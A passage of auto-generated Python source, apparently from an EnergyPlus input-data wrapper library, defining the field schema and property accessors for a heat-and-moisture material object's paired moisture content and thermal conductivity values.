'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'thermal conductivity 1',
{'name': u'Thermal Conductivity 1',
'pyname': u'thermal_conductivity_1',
'minimum>': 0.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'unit': u'W/m-K'}),
(u'moisture content 2',
{'name': u'Moisture Content 2',
'pyname': u'moisture_content_2',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'thermal conductivity 2',
{'name': u'Thermal Conductivity 2',
'pyname': u'thermal_conductivity_2',
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'unit': u'W/m-K'}),
(u'moisture content 3',
{'name': u'Moisture Content 3',
'pyname': u'moisture_content_3',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'thermal conductivity 3',
{'name': u'Thermal Conductivity 3',
'pyname': u'thermal_conductivity_3',
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'unit': u'W/m-K'}),
(u'moisture content 4',
{'name': u'Moisture Content 4',
'pyname': u'moisture_content_4',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'thermal conductivity 4',
{'name': u'Thermal Conductivity 4',
'pyname': u'thermal_conductivity_4',
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'unit': u'W/m-K'}),
(u'moisture content 5',
{'name': u'Moisture Content 5',
'pyname': u'moisture_content_5',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'thermal conductivity 5',
{'name': u'Thermal Conductivity 5',
'pyname': u'thermal_conductivity_5',
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'unit': u'W/m-K'}),
(u'moisture content 6',
{'name': u'Moisture Content 6',
'pyname': u'moisture_content_6',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'thermal conductivity 6',
{'name': u'Thermal Conductivity 6',
'pyname': u'thermal_conductivity_6',
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'unit': u'W/m-K'}),
(u'moisture content 7',
{'name': u'Moisture Content 7',
'pyname': u'moisture_content_7',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'thermal conductivity 7',
{'name': u'Thermal Conductivity 7',
'pyname': u'thermal_conductivity_7',
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'unit': u'W/m-K'}),
(u'moisture content 8',
{'name': u'Moisture Content 8',
'pyname': u'moisture_content_8',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'thermal conductivity 8',
{'name': u'Thermal Conductivity 8',
'pyname': u'thermal_conductivity_8',
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'unit': u'W/m-K'}),
(u'moisture content 9',
{'name': u'Moisture Content 9',
'pyname': u'moisture_content_9',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'thermal conductivity 9',
{'name': u'Thermal Conductivity 9',
'pyname': u'thermal_conductivity_9',
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'unit': u'W/m-K'}),
(u'moisture content 10',
{'name': u'Moisture Content 10',
'pyname': u'moisture_content_10',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'thermal conductivity 10',
{'name': u'Thermal Conductivity 10',
'pyname': u'thermal_conductivity_10',
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'unit': u'W/m-K'}),
(u'moisture content 11',
{'name': u'Moisture Content 11',
'pyname': u'moisture_content_11',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'thermal conductivity 11',
{'name': u'Thermal Conductivity 11',
'pyname': u'thermal_conductivity_11',
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'unit': u'W/m-K'}),
(u'moisture content 12',
{'name': u'Moisture Content 12',
'pyname': u'moisture_content_12',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'thermal conductivity 12',
{'name': u'Thermal Conductivity 12',
'pyname': u'thermal_conductivity_12',
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'unit': u'W/m-K'}),
(u'moisture content 13',
{'name': u'Moisture Content 13',
'pyname': u'moisture_content_13',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'thermal conductivity 13',
{'name': u'Thermal Conductivity 13',
'pyname': u'thermal_conductivity_13',
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'unit': u'W/m-K'}),
(u'moisture content 14',
{'name': u'Moisture Content 14',
'pyname': u'moisture_content_14',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'thermal conductivity 14',
{'name': u'Thermal Conductivity 14',
'pyname': u'thermal_conductivity_14',
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'unit': u'W/m-K'}),
(u'moisture content 15',
{'name': u'Moisture Content 15',
'pyname': u'moisture_content_15',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'thermal conductivity 15',
{'name': u'Thermal Conductivity 15',
'pyname': u'thermal_conductivity_15',
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'unit': u'W/m-K'}),
(u'moisture content 16',
{'name': u'Moisture Content 16',
'pyname': u'moisture_content_16',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'thermal conductivity 16',
{'name': u'Thermal Conductivity 16',
'pyname': u'thermal_conductivity_16',
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'unit': u'W/m-K'}),
(u'moisture content 17',
{'name': u'Moisture Content 17',
'pyname': u'moisture_content_17',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'thermal conductivity 17',
{'name': u'Thermal Conductivity 17',
'pyname': u'thermal_conductivity_17',
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'unit': u'W/m-K'}),
(u'moisture content 18',
{'name': u'Moisture Content 18',
'pyname': u'moisture_content_18',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'thermal conductivity 18',
{'name': u'Thermal Conductivity 18',
'pyname': u'thermal_conductivity_18',
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'unit': u'W/m-K'}),
(u'moisture content 19',
{'name': u'Moisture Content 19',
'pyname': u'moisture_content_19',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'thermal conductivity 19',
{'name': u'Thermal Conductivity 19',
'pyname': u'thermal_conductivity_19',
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'unit': u'W/m-K'}),
(u'moisture content 20',
{'name': u'Moisture Content 20',
'pyname': u'moisture_content_20',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'thermal conductivity 20',
{'name': u'Thermal Conductivity 20',
'pyname': u'thermal_conductivity_20',
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'unit': u'W/m-K'}),
(u'moisture content 21',
{'name': u'Moisture Content 21',
'pyname': u'moisture_content_21',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'thermal conductivity 21',
{'name': u'Thermal Conductivity 21',
'pyname': u'thermal_conductivity_21',
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'unit': u'W/m-K'}),
(u'moisture content 22',
{'name': u'Moisture Content 22',
'pyname': u'moisture_content_22',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'thermal conductivity 22',
{'name': u'Thermal Conductivity 22',
'pyname': u'thermal_conductivity_22',
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'unit': u'W/m-K'}),
(u'moisture content 23',
{'name': u'Moisture Content 23',
'pyname': u'moisture_content_23',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'thermal conductivity 23',
{'name': u'Thermal Conductivity 23',
'pyname': u'thermal_conductivity_23',
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'unit': u'W/m-K'}),
(u'moisture content 24',
{'name': u'Moisture Content 24',
'pyname': u'moisture_content_24',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'thermal conductivity 24',
{'name': u'Thermal Conductivity 24',
'pyname': u'thermal_conductivity_24',
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'unit': u'W/m-K'}),
(u'moisture content 25',
{'name': u'Moisture Content 25',
'pyname': u'moisture_content_25',
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': 'real',
'unit': u'kg/m3'}),
(u'thermal conductivity 25',
{'name': u'Thermal Conductivity 25',
'pyname': u'thermal_conductivity_25',
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'unit': u'W/m-K'})]),
'format': None,
'group': u'Surface Construction Elements',
'min-fields': 0,
'name': u'MaterialProperty:HeatAndMoistureTransfer:ThermalConductivity',
'pyname': u'MaterialPropertyHeatAndMoistureTransferThermalConductivity',
'required-object': False,
'unique-object': False}
@property
def material_name(self):
"""field `Material Name`
| Moisture Material Name that the Thermal Conductivity will be added to.
Args:
value (str): value for IDD Field `Material Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `material_name` or None if not set
"""
return self["Material Name"]
@material_name.setter
def material_name(self, value=None):
"""Corresponds to IDD field `Material Name`"""
self["Material Name"] = value
@property
def number_of_thermal_coordinates(self):
"""field `Number of Thermal Coordinates`
| number of data coordinates
| value >= 1
| value <= 25
Args:
value (int): value for IDD Field `Number of Thermal Coordinates`
Raises:
ValueError: if `value` is not a valid value
Returns:
int: the value of `number_of_thermal_coordinates` or None if not set
"""
return self["Number of Thermal Coordinates"]
@number_of_thermal_coordinates.setter
def number_of_thermal_coordinates(self, value=None):
"""Corresponds to IDD field `Number of Thermal Coordinates`"""
self["Number of Thermal Coordinates"] = value
@property
def moisture_content_1(self):
"""field `Moisture Content 1`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 1`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_1` or None if not set
"""
return self["Moisture Content 1"]
@moisture_content_1.setter
def moisture_content_1(self, value=None):
"""Corresponds to IDD field `Moisture Content 1`"""
self["Moisture Content 1"] = value
@property
def thermal_conductivity_1(self):
"""field `Thermal Conductivity 1`
| Units: W/m-K
Args:
value (float): value for IDD Field `Thermal Conductivity 1`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thermal_conductivity_1` or None if not set
"""
return self["Thermal Conductivity 1"]
@thermal_conductivity_1.setter
def thermal_conductivity_1(self, value=None):
"""Corresponds to IDD field `Thermal Conductivity 1`"""
self["Thermal Conductivity 1"] = value
@property
def moisture_content_2(self):
"""field `Moisture Content 2`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 2`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_2` or None if not set
"""
return self["Moisture Content 2"]
@moisture_content_2.setter
def moisture_content_2(self, value=None):
"""Corresponds to IDD field `Moisture Content 2`"""
self["Moisture Content 2"] = value
@property
def thermal_conductivity_2(self):
"""field `Thermal Conductivity 2`
| Units: W/m-K
Args:
value (float): value for IDD Field `Thermal Conductivity 2`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thermal_conductivity_2` or None if not set
"""
return self["Thermal Conductivity 2"]
@thermal_conductivity_2.setter
def thermal_conductivity_2(self, value=None):
"""Corresponds to IDD field `Thermal Conductivity 2`"""
self["Thermal Conductivity 2"] = value
@property
def moisture_content_3(self):
"""field `Moisture Content 3`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 3`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_3` or None if not set
"""
return self["Moisture Content 3"]
@moisture_content_3.setter
def moisture_content_3(self, value=None):
"""Corresponds to IDD field `Moisture Content 3`"""
self["Moisture Content 3"] = value
@property
def thermal_conductivity_3(self):
"""field `Thermal Conductivity 3`
| Units: W/m-K
Args:
value (float): value for IDD Field `Thermal Conductivity 3`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thermal_conductivity_3` or None if not set
"""
return self["Thermal Conductivity 3"]
@thermal_conductivity_3.setter
def thermal_conductivity_3(self, value=None):
"""Corresponds to IDD field `Thermal Conductivity 3`"""
self["Thermal Conductivity 3"] = value
@property
def moisture_content_4(self):
"""field `Moisture Content 4`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 4`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_4` or None if not set
"""
return self["Moisture Content 4"]
@moisture_content_4.setter
def moisture_content_4(self, value=None):
"""Corresponds to IDD field `Moisture Content 4`"""
self["Moisture Content 4"] = value
@property
def thermal_conductivity_4(self):
"""field `Thermal Conductivity 4`
| Units: W/m-K
Args:
value (float): value for IDD Field `Thermal Conductivity 4`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thermal_conductivity_4` or None if not set
"""
return self["Thermal Conductivity 4"]
@thermal_conductivity_4.setter
def thermal_conductivity_4(self, value=None):
"""Corresponds to IDD field `Thermal Conductivity 4`"""
self["Thermal Conductivity 4"] = value
@property
def moisture_content_5(self):
"""field `Moisture Content 5`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 5`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_5` or None if not set
"""
return self["Moisture Content 5"]
@moisture_content_5.setter
def moisture_content_5(self, value=None):
"""Corresponds to IDD field `Moisture Content 5`"""
self["Moisture Content 5"] = value
@property
def thermal_conductivity_5(self):
"""field `Thermal Conductivity 5`
| Units: W/m-K
Args:
value (float): value for IDD Field `Thermal Conductivity 5`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thermal_conductivity_5` or None if not set
"""
return self["Thermal Conductivity 5"]
@thermal_conductivity_5.setter
def thermal_conductivity_5(self, value=None):
"""Corresponds to IDD field `Thermal Conductivity 5`"""
self["Thermal Conductivity 5"] = value
@property
def moisture_content_6(self):
"""field `Moisture Content 6`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 6`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_6` or None if not set
"""
return self["Moisture Content 6"]
@moisture_content_6.setter
def moisture_content_6(self, value=None):
"""Corresponds to IDD field `Moisture Content 6`"""
self["Moisture Content 6"] = value
@property
def thermal_conductivity_6(self):
"""field `Thermal Conductivity 6`
| Units: W/m-K
Args:
value (float): value for IDD Field `Thermal Conductivity 6`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thermal_conductivity_6` or None if not set
"""
return self["Thermal Conductivity 6"]
@thermal_conductivity_6.setter
def thermal_conductivity_6(self, value=None):
"""Corresponds to IDD field `Thermal Conductivity 6`"""
self["Thermal Conductivity 6"] = value
@property
def moisture_content_7(self):
"""field `Moisture Content 7`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 7`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_7` or None if not set
"""
return self["Moisture Content 7"]
@moisture_content_7.setter
def moisture_content_7(self, value=None):
"""Corresponds to IDD field `Moisture Content 7`"""
self["Moisture Content 7"] = value
@property
def thermal_conductivity_7(self):
"""field `Thermal Conductivity 7`
| Units: W/m-K
Args:
value (float): value for IDD Field `Thermal Conductivity 7`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thermal_conductivity_7` or None if not set
"""
return self["Thermal Conductivity 7"]
@thermal_conductivity_7.setter
def thermal_conductivity_7(self, value=None):
"""Corresponds to IDD field `Thermal Conductivity 7`"""
self["Thermal Conductivity 7"] = value
@property
def moisture_content_8(self):
"""field `Moisture Content 8`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 8`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_8` or None if not set
"""
return self["Moisture Content 8"]
@moisture_content_8.setter
def moisture_content_8(self, value=None):
"""Corresponds to IDD field `Moisture Content 8`"""
self["Moisture Content 8"] = value
@property
def thermal_conductivity_8(self):
"""field `Thermal Conductivity 8`
| Units: W/m-K
Args:
value (float): value for IDD Field `Thermal Conductivity 8`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thermal_conductivity_8` or None if not set
"""
return self["Thermal Conductivity 8"]
@thermal_conductivity_8.setter
def thermal_conductivity_8(self, value=None):
"""Corresponds to IDD field `Thermal Conductivity 8`"""
self["Thermal Conductivity 8"] = value
@property
def moisture_content_9(self):
"""field `Moisture Content 9`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 9`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_9` or None if not set
"""
return self["Moisture Content 9"]
@moisture_content_9.setter
def moisture_content_9(self, value=None):
"""Corresponds to IDD field `Moisture Content 9`"""
self["Moisture Content 9"] = value
@property
def thermal_conductivity_9(self):
"""field `Thermal Conductivity 9`
| Units: W/m-K
Args:
value (float): value for IDD Field `Thermal Conductivity 9`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thermal_conductivity_9` or None if not set
"""
return self["Thermal Conductivity 9"]
@thermal_conductivity_9.setter
def thermal_conductivity_9(self, value=None):
"""Corresponds to IDD field `Thermal Conductivity 9`"""
self["Thermal Conductivity 9"] = value
@property
def moisture_content_10(self):
"""field `Moisture Content 10`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 10`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_10` or None if not set
"""
return self["Moisture Content 10"]
@moisture_content_10.setter
def moisture_content_10(self, value=None):
"""Corresponds to IDD field `Moisture Content 10`"""
self["Moisture Content 10"] = value
@property
def thermal_conductivity_10(self):
"""field `Thermal Conductivity 10`
| Units: W/m-K
Args:
value (float): value for IDD Field `Thermal Conductivity 10`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thermal_conductivity_10` or None if not set
"""
return self["Thermal Conductivity 10"]
@thermal_conductivity_10.setter
def thermal_conductivity_10(self, value=None):
"""Corresponds to IDD field `Thermal Conductivity 10`"""
self["Thermal Conductivity 10"] = value
@property
def moisture_content_11(self):
"""field `Moisture Content 11`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 11`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_11` or None if not set
"""
return self["Moisture Content 11"]
@moisture_content_11.setter
def moisture_content_11(self, value=None):
"""Corresponds to IDD field `Moisture Content 11`"""
self["Moisture Content 11"] = value
@property
def thermal_conductivity_11(self):
"""field `Thermal Conductivity 11`
| Units: W/m-K
Args:
value (float): value for IDD Field `Thermal Conductivity 11`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thermal_conductivity_11` or None if not set
"""
return self["Thermal Conductivity 11"]
@thermal_conductivity_11.setter
def thermal_conductivity_11(self, value=None):
"""Corresponds to IDD field `Thermal Conductivity 11`"""
self["Thermal Conductivity 11"] = value
@property
def moisture_content_12(self):
"""field `Moisture Content 12`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 12`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_12` or None if not set
"""
return self["Moisture Content 12"]
@moisture_content_12.setter
def moisture_content_12(self, value=None):
"""Corresponds to IDD field `Moisture Content 12`"""
self["Moisture Content 12"] = value
@property
def thermal_conductivity_12(self):
"""field `Thermal Conductivity 12`
| Units: W/m-K
Args:
value (float): value for IDD Field `Thermal Conductivity 12`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thermal_conductivity_12` or None if not set
"""
return self["Thermal Conductivity 12"]
@thermal_conductivity_12.setter
def thermal_conductivity_12(self, value=None):
"""Corresponds to IDD field `Thermal Conductivity 12`"""
self["Thermal Conductivity 12"] = value
@property
def moisture_content_13(self):
"""field `Moisture Content 13`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 13`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_13` or None if not set
"""
return self["Moisture Content 13"]
@moisture_content_13.setter
def moisture_content_13(self, value=None):
"""Corresponds to IDD field `Moisture Content 13`"""
self["Moisture Content 13"] = value
@property
def thermal_conductivity_13(self):
"""field `Thermal Conductivity 13`
| Units: W/m-K
Args:
value (float): value for IDD Field `Thermal Conductivity 13`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thermal_conductivity_13` or None if not set
"""
return self["Thermal Conductivity 13"]
@thermal_conductivity_13.setter
def thermal_conductivity_13(self, value=None):
"""Corresponds to IDD field `Thermal Conductivity 13`"""
self["Thermal Conductivity 13"] = value
@property
def moisture_content_14(self):
"""field `Moisture Content 14`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 14`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_14` or None if not set
"""
return self["Moisture Content 14"]
@moisture_content_14.setter
def moisture_content_14(self, value=None):
"""Corresponds to IDD field `Moisture Content 14`"""
self["Moisture Content 14"] = value
@property
def thermal_conductivity_14(self):
"""field `Thermal Conductivity 14`
| Units: W/m-K
Args:
value (float): value for IDD Field `Thermal Conductivity 14`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thermal_conductivity_14` or None if not set
"""
return self["Thermal Conductivity 14"]
@thermal_conductivity_14.setter
def thermal_conductivity_14(self, value=None):
"""Corresponds to IDD field `Thermal Conductivity 14`"""
self["Thermal Conductivity 14"] = value
@property
def moisture_content_15(self):
"""field `Moisture Content 15`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 15`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_15` or None if not set
"""
return self["Moisture Content 15"]
@moisture_content_15.setter
def moisture_content_15(self, value=None):
"""Corresponds to IDD field `Moisture Content 15`"""
self["Moisture Content 15"] = value
@property
def thermal_conductivity_15(self):
"""field `Thermal Conductivity 15`
| Units: W/m-K
Args:
value (float): value for IDD Field `Thermal Conductivity 15`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thermal_conductivity_15` or None if not set
"""
return self["Thermal Conductivity 15"]
@thermal_conductivity_15.setter
def thermal_conductivity_15(self, value=None):
"""Corresponds to IDD field `Thermal Conductivity 15`"""
self["Thermal Conductivity 15"] = value
@property
def moisture_content_16(self):
"""field `Moisture Content 16`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 16`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_16` or None if not set
"""
return self["Moisture Content 16"]
@moisture_content_16.setter
def moisture_content_16(self, value=None):
"""Corresponds to IDD field `Moisture Content 16`"""
self["Moisture Content 16"] = value
@property
def thermal_conductivity_16(self):
"""field `Thermal Conductivity 16`
| Units: W/m-K
Args:
value (float): value for IDD Field `Thermal Conductivity 16`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thermal_conductivity_16` or None if not set
"""
return self["Thermal Conductivity 16"]
@thermal_conductivity_16.setter
def thermal_conductivity_16(self, value=None):
"""Corresponds to IDD field `Thermal Conductivity 16`"""
self["Thermal Conductivity 16"] = value
@property
def moisture_content_17(self):
"""field `Moisture Content 17`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 17`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_17` or None if not set
"""
return self["Moisture Content 17"]
@moisture_content_17.setter
def moisture_content_17(self, value=None):
"""Corresponds to IDD field `Moisture Content 17`"""
self["Moisture Content 17"] = value
@property
def thermal_conductivity_17(self):
"""field `Thermal Conductivity 17`
| Units: W/m-K
Args:
value (float): value for IDD Field `Thermal Conductivity 17`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thermal_conductivity_17` or None if not set
"""
return self["Thermal Conductivity 17"]
@thermal_conductivity_17.setter
def thermal_conductivity_17(self, value=None):
"""Corresponds to IDD field `Thermal Conductivity 17`"""
self["Thermal Conductivity 17"] = value
@property
def moisture_content_18(self):
"""field `Moisture Content 18`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 18`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_18` or None if not set
"""
return self["Moisture Content 18"]
@moisture_content_18.setter
def moisture_content_18(self, value=None):
"""Corresponds to IDD field `Moisture Content 18`"""
self["Moisture Content 18"] = value
@property
def thermal_conductivity_18(self):
"""field `Thermal Conductivity 18`
| Units: W/m-K
Args:
value (float): value for IDD Field `Thermal Conductivity 18`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thermal_conductivity_18` or None if not set
"""
return self["Thermal Conductivity 18"]
@thermal_conductivity_18.setter
def thermal_conductivity_18(self, value=None):
"""Corresponds to IDD field `Thermal Conductivity 18`"""
self["Thermal Conductivity 18"] = value
@property
def moisture_content_19(self):
"""field `Moisture Content 19`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 19`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_19` or None if not set
"""
return self["Moisture Content 19"]
@moisture_content_19.setter
def moisture_content_19(self, value=None):
"""Corresponds to IDD field `Moisture Content 19`"""
self["Moisture Content 19"] = value
@property
def thermal_conductivity_19(self):
"""field `Thermal Conductivity 19`
| Units: W/m-K
Args:
value (float): value for IDD Field `Thermal Conductivity 19`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thermal_conductivity_19` or None if not set
"""
return self["Thermal Conductivity 19"]
@thermal_conductivity_19.setter
def thermal_conductivity_19(self, value=None):
"""Corresponds to IDD field `Thermal Conductivity 19`"""
self["Thermal Conductivity 19"] = value
@property
def moisture_content_20(self):
"""field `Moisture Content 20`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 20`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_20` or None if not set
"""
return self["Moisture Content 20"]
@moisture_content_20.setter
def moisture_content_20(self, value=None):
"""Corresponds to IDD field `Moisture Content 20`"""
self["Moisture Content 20"] = value
@property
def thermal_conductivity_20(self):
"""field `Thermal Conductivity 20`
| Units: W/m-K
Args:
value (float): value for IDD Field `Thermal Conductivity 20`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thermal_conductivity_20` or None if not set
"""
return self["Thermal Conductivity 20"]
@thermal_conductivity_20.setter
def thermal_conductivity_20(self, value=None):
"""Corresponds to IDD field `Thermal Conductivity 20`"""
self["Thermal Conductivity 20"] = value
@property
def moisture_content_21(self):
"""field `Moisture Content 21`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 21`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_21` or None if not set
"""
return self["Moisture Content 21"]
@moisture_content_21.setter
def moisture_content_21(self, value=None):
"""Corresponds to IDD field `Moisture Content 21`"""
self["Moisture Content 21"] = value
@property
def thermal_conductivity_21(self):
"""field `Thermal Conductivity 21`
| Units: W/m-K
Args:
value (float): value for IDD Field `Thermal Conductivity 21`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thermal_conductivity_21` or None if not set
"""
return self["Thermal Conductivity 21"]
@thermal_conductivity_21.setter
def thermal_conductivity_21(self, value=None):
"""Corresponds to IDD field `Thermal Conductivity 21`"""
self["Thermal Conductivity 21"] = value
@property
def moisture_content_22(self):
"""field `Moisture Content 22`
| Units: kg/m3
Args:
value (float): value for IDD Field `Moisture Content 22`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `moisture_content_22` or None if not set
"""
return self["Moisture Content 22"]
@moisture_content_22.setter
def moisture_content_22(self, value=None):
"""Corresponds to IDD field `Moisture Content 22`"""
self["Moisture Content 22"] = value
@property
def thermal_conductivity_22(self):
